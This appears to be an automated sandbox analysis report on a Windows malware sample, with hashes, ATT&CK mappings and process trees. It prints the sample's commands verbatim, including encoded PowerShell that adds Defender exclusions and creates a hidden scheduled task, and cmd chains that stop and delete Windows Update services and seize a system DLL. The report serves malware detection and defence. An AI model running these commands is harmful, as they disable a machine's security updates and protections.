5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07

General

Target

5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe
Size

2.2MB
MD5

d5dfb8447ced11274942ace31b4279d8
SHA1

5a1b36ef9db72321b3d075712a8888bd921a472c
SHA256

5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07
SHA512

92db93c843cbff0cc8d0ea4d5503be85c1a52986b5a89041680d8c287bbf06715c1019e0065b364f4fda1dcf94891366c7c74791f3269704b4100b21a0de9fde
SSDEEP

49152:NZMzod1k0XlJTfu7lCwMBLEUGu20S2hnnRYKiPCZYj8bkN2P:N2C1k+bMlCwWl2qhnnRYKECZYI44

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe

Drops file in Drivers directory 2 IoCs

Processes:

5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exeupdates.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	updates.exe

Executes dropped EXE 1 IoCs

Processes:

updates.exe

pid process

4652 updates.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

4904 takeown.exe
4180 icacls.exe
3176 takeown.exe
4600 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

3176 takeown.exe
4600 icacls.exe
4904 takeown.exe
4180 icacls.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1880 sc.exe
4964 sc.exe
1996 sc.exe
4836 sc.exe
4524 sc.exe
1052 sc.exe
3644 sc.exe
4868 sc.exe
4704 sc.exe
4752 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
4652	updates.exe

pid	process
4904	takeown.exe
4180	icacls.exe
3176	takeown.exe
4600	icacls.exe

pid	process
3176	takeown.exe
4600	icacls.exe
4904	takeown.exe
4180	icacls.exe

pid	process
1880	sc.exe
4964	sc.exe
1996	sc.exe
4836	sc.exe
4524	sc.exe
1052	sc.exe
3644	sc.exe
4868	sc.exe
4704	sc.exe
4752	sc.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
3900	reg.exe
4036	reg.exe
908	reg.exe
4716	reg.exe
3640	reg.exe
4512	reg.exe
1448	reg.exe
1572	reg.exe
4796	reg.exe
4912	reg.exe
4488	reg.exe
4736	reg.exe
4492	reg.exe
516	reg.exe
4300	reg.exe
4860	reg.exe
1884	reg.exe
3016	reg.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

powershell.exepowershell.exe5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exepowershell.exepowershell.exe

pid	process
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4308	powershell.exe
4308	powershell.exe
4308	powershell.exe
4672	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe
3268	powershell.exe
3268	powershell.exe
3268	powershell.exe
2324	powershell.exe
2324	powershell.exe
2324	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	4164	powershell.exe
Token: SeIncreaseQuotaPrivilege	4164	powershell.exe
Token: SeSecurityPrivilege	4164	powershell.exe
Token: SeTakeOwnershipPrivilege	4164	powershell.exe
Token: SeLoadDriverPrivilege	4164	powershell.exe
Token: SeSystemProfilePrivilege	4164	powershell.exe
Token: SeSystemtimePrivilege	4164	powershell.exe
Token: SeProfSingleProcessPrivilege	4164	powershell.exe
Token: SeIncBasePriorityPrivilege	4164	powershell.exe
Token: SeCreatePagefilePrivilege	4164	powershell.exe
Token: SeBackupPrivilege	4164	powershell.exe
Token: SeRestorePrivilege	4164	powershell.exe
Token: SeShutdownPrivilege	4164	powershell.exe
Token: SeDebugPrivilege	4164	powershell.exe
Token: SeSystemEnvironmentPrivilege	4164	powershell.exe
Token: SeRemoteShutdownPrivilege	4164	powershell.exe
Token: SeUndockPrivilege	4164	powershell.exe
Token: SeManageVolumePrivilege	4164	powershell.exe
Token: 33	4164	powershell.exe
Token: 34	4164	powershell.exe
Token: 35	4164	powershell.exe
Token: 36	4164	powershell.exe
Token: SeShutdownPrivilege	1156	powercfg.exe
Token: SeCreatePagefilePrivilege	1156	powercfg.exe
Token: SeShutdownPrivilege	4904	powercfg.exe
Token: SeCreatePagefilePrivilege	4904	powercfg.exe
Token: SeShutdownPrivilege	3292	powercfg.exe
Token: SeCreatePagefilePrivilege	3292	powercfg.exe
Token: SeShutdownPrivilege	2968	powercfg.exe
Token: SeCreatePagefilePrivilege	2968	powercfg.exe
Token: SeDebugPrivilege	4308	powershell.exe
Token: SeTakeOwnershipPrivilege	3176	takeown.exe
Token: SeIncreaseQuotaPrivilege	4308	powershell.exe
Token: SeSecurityPrivilege	4308	powershell.exe
Token: SeTakeOwnershipPrivilege	4308	powershell.exe
Token: SeLoadDriverPrivilege	4308	powershell.exe
Token: SeSystemProfilePrivilege	4308	powershell.exe
Token: SeSystemtimePrivilege	4308	powershell.exe
Token: SeProfSingleProcessPrivilege	4308	powershell.exe
Token: SeIncBasePriorityPrivilege	4308	powershell.exe
Token: SeCreatePagefilePrivilege	4308	powershell.exe
Token: SeBackupPrivilege	4308	powershell.exe
Token: SeRestorePrivilege	4308	powershell.exe
Token: SeShutdownPrivilege	4308	powershell.exe
Token: SeDebugPrivilege	4308	powershell.exe
Token: SeSystemEnvironmentPrivilege	4308	powershell.exe
Token: SeRemoteShutdownPrivilege	4308	powershell.exe
Token: SeUndockPrivilege	4308	powershell.exe
Token: SeManageVolumePrivilege	4308	powershell.exe
Token: 33	4308	powershell.exe
Token: 34	4308	powershell.exe
Token: 35	4308	powershell.exe
Token: 36	4308	powershell.exe
Token: SeIncreaseQuotaPrivilege	4308	powershell.exe
Token: SeSecurityPrivilege	4308	powershell.exe
Token: SeTakeOwnershipPrivilege	4308	powershell.exe
Token: SeLoadDriverPrivilege	4308	powershell.exe
Token: SeSystemProfilePrivilege	4308	powershell.exe
Token: SeSystemtimePrivilege	4308	powershell.exe
Token: SeProfSingleProcessPrivilege	4308	powershell.exe
Token: SeIncBasePriorityPrivilege	4308	powershell.exe
Token: SeCreatePagefilePrivilege	4308	powershell.exe
Token: SeBackupPrivilege	4308	powershell.exe
Token: SeRestorePrivilege	4308	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4672 wrote to memory of 4164	4672	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	powershell.exe
PID 4672 wrote to memory of 4164	4672	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	powershell.exe
PID 4672 wrote to memory of 2924	4672	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	cmd.exe
PID 4672 wrote to memory of 2924	4672	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	cmd.exe
PID 4672 wrote to memory of 4092	4672	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	cmd.exe
PID 4672 wrote to memory of 4092	4672	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	cmd.exe
PID 2924 wrote to memory of 1880	2924	cmd.exe	sc.exe
PID 2924 wrote to memory of 1880	2924	cmd.exe	sc.exe
PID 4092 wrote to memory of 1156	4092	cmd.exe	powercfg.exe
PID 4092 wrote to memory of 1156	4092	cmd.exe	powercfg.exe
PID 2924 wrote to memory of 1052	2924	cmd.exe	sc.exe
PID 2924 wrote to memory of 1052	2924	cmd.exe	sc.exe
PID 4092 wrote to memory of 4904	4092	cmd.exe	powercfg.exe
PID 4092 wrote to memory of 4904	4092	cmd.exe	powercfg.exe
PID 2924 wrote to memory of 4868	2924	cmd.exe	sc.exe
PID 2924 wrote to memory of 4868	2924	cmd.exe	sc.exe
PID 4092 wrote to memory of 3292	4092	cmd.exe	powercfg.exe
PID 4092 wrote to memory of 3292	4092	cmd.exe	powercfg.exe
PID 4672 wrote to memory of 4308	4672	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	powershell.exe
PID 4672 wrote to memory of 4308	4672	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	powershell.exe
PID 2924 wrote to memory of 3644	2924	cmd.exe	sc.exe
PID 2924 wrote to memory of 3644	2924	cmd.exe	sc.exe
PID 4092 wrote to memory of 2968	4092	cmd.exe	powercfg.exe
PID 4092 wrote to memory of 2968	4092	cmd.exe	powercfg.exe
PID 2924 wrote to memory of 4964	2924	cmd.exe	sc.exe
PID 2924 wrote to memory of 4964	2924	cmd.exe	sc.exe
PID 2924 wrote to memory of 3900	2924	cmd.exe	reg.exe
PID 2924 wrote to memory of 3900	2924	cmd.exe	reg.exe
PID 2924 wrote to memory of 4796	2924	cmd.exe	reg.exe
PID 2924 wrote to memory of 4796	2924	cmd.exe	reg.exe
PID 2924 wrote to memory of 4912	2924	cmd.exe	reg.exe
PID 2924 wrote to memory of 4912	2924	cmd.exe	reg.exe
PID 2924 wrote to memory of 4036	2924	cmd.exe	reg.exe
PID 2924 wrote to memory of 4036	2924	cmd.exe	reg.exe
PID 2924 wrote to memory of 4492	2924	cmd.exe	reg.exe
PID 2924 wrote to memory of 4492	2924	cmd.exe	reg.exe
PID 2924 wrote to memory of 3176	2924	cmd.exe	takeown.exe
PID 2924 wrote to memory of 3176	2924	cmd.exe	takeown.exe
PID 2924 wrote to memory of 4600	2924	cmd.exe	icacls.exe
PID 2924 wrote to memory of 4600	2924	cmd.exe	icacls.exe
PID 4672 wrote to memory of 3080	4672	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	cmd.exe
PID 4672 wrote to memory of 3080	4672	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	cmd.exe
PID 4672 wrote to memory of 3256	4672	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	cmd.exe
PID 4672 wrote to memory of 3256	4672	5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe	cmd.exe
PID 3080 wrote to memory of 4480	3080	cmd.exe	schtasks.exe
PID 3080 wrote to memory of 4480	3080	cmd.exe	schtasks.exe
PID 3256 wrote to memory of 4440	3256	cmd.exe	choice.exe
PID 3256 wrote to memory of 4440	3256	cmd.exe	choice.exe
PID 2924 wrote to memory of 4488	2924	cmd.exe	reg.exe
PID 2924 wrote to memory of 4488	2924	cmd.exe	reg.exe
PID 2924 wrote to memory of 4512	2924	cmd.exe	reg.exe
PID 2924 wrote to memory of 4512	2924	cmd.exe	reg.exe
PID 2924 wrote to memory of 908	2924	cmd.exe	reg.exe
PID 2924 wrote to memory of 908	2924	cmd.exe	reg.exe
PID 2924 wrote to memory of 516	2924	cmd.exe	reg.exe
PID 2924 wrote to memory of 516	2924	cmd.exe	reg.exe
PID 2924 wrote to memory of 4484	2924	cmd.exe	schtasks.exe
PID 2924 wrote to memory of 4484	2924	cmd.exe	schtasks.exe
PID 2924 wrote to memory of 684	2924	cmd.exe	schtasks.exe
PID 2924 wrote to memory of 684	2924	cmd.exe	schtasks.exe
PID 2924 wrote to memory of 1148	2924	cmd.exe	schtasks.exe
PID 2924 wrote to memory of 1148	2924	cmd.exe	schtasks.exe
PID 2924 wrote to memory of 1528	2924	cmd.exe	schtasks.exe
PID 2924 wrote to memory of 1528	2924	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe
"C:\Users\Admin\AppData\Local\Temp\5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe"
1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAeAB0AHoAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBsAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAHQAYwBuAGcAIwA+ACAAQAAoACAAPAAjAHIAagAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAaABzAGoAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAagBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbwB1ACMAPgA="
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4164

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAZwAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwAiAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAbwBuAGUAZAByAGkAdgBlAHMAXAB1AHAAZABhAHQAZQBzAC4AZQB4AGUAIgAnACkAIAA8ACMAbwBiAHAAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AEwAbwBnAE8AbgApACAAPAAjAGEAcAAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAHgAbQBsACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBPAG4AZQBEAHIAaQB2AGUAcwBTAHkAcwB0AGUAbQBzACcAIAAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBqAHYAIwA+ADsA"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4308

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:4092

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
2⤵
- Suspicious use of WriteProcessMemory
PID:2924

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:4488

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:1412

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
3⤵
PID:616

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
3⤵
PID:1780

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
3⤵
PID:1528

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
3⤵
PID:1148

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
3⤵
PID:684

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
3⤵
PID:4484

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:516

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:908

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:4512

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "OneDrivesSystems"
2⤵
- Suspicious use of WriteProcessMemory
PID:3080

C:\Windows\system32\schtasks.exe
schtasks /run /tn "OneDrivesSystems"
3⤵
PID:4480

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\5ad0140b342166a7094794f878bd271cb48567149b91119c0bc2ebabb6399f07.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:3256

C:\Windows\system32\sc.exe
sc stop UsoSvc
1⤵
- Launches sc.exe
PID:1880

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1156

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
1⤵
- Launches sc.exe
PID:1052

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4904

C:\Windows\system32\sc.exe
sc stop bits
1⤵
- Launches sc.exe
PID:3644

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
1⤵
- Modifies registry key
PID:3900

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
1⤵
- Modifies registry key
PID:4796

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
1⤵
- Modifies security service
- Modifies registry key
PID:4912

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
1⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3176

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
1⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4600

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
1⤵
- Modifies registry key
PID:4492

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
1⤵
- Modifies registry key
PID:4036

C:\Windows\system32\sc.exe
sc stop dosvc
1⤵
- Launches sc.exe
PID:4964

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2968

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3292

C:\Windows\system32\sc.exe
sc stop wuauserv
1⤵
- Launches sc.exe
PID:4868

C:\Users\Admin\AppData\Local\Temp\onedrives\updates.exe
C:\Users\Admin\AppData\Local\Temp\onedrives\updates.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:4652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAeAB0AHoAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBsAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAHQAYwBuAGcAIwA+ACAAQAAoACAAPAAjAHIAagAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAaABzAGoAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAagBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbwB1ACMAPgA="
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3268

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
2⤵
PID:2708

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:4704

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1996

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:4836

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:4752

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:4524

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
3⤵
- Modifies registry key
PID:4716

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
3⤵
- Modifies registry key
PID:4736

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
3⤵
- Modifies registry key
PID:4300

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
3⤵
- Modifies registry key
PID:1448

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
3⤵
- Modifies registry key
PID:4860

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4904

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4180

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:1884

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:1572

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:3640

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:3016

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
3⤵
PID:4004

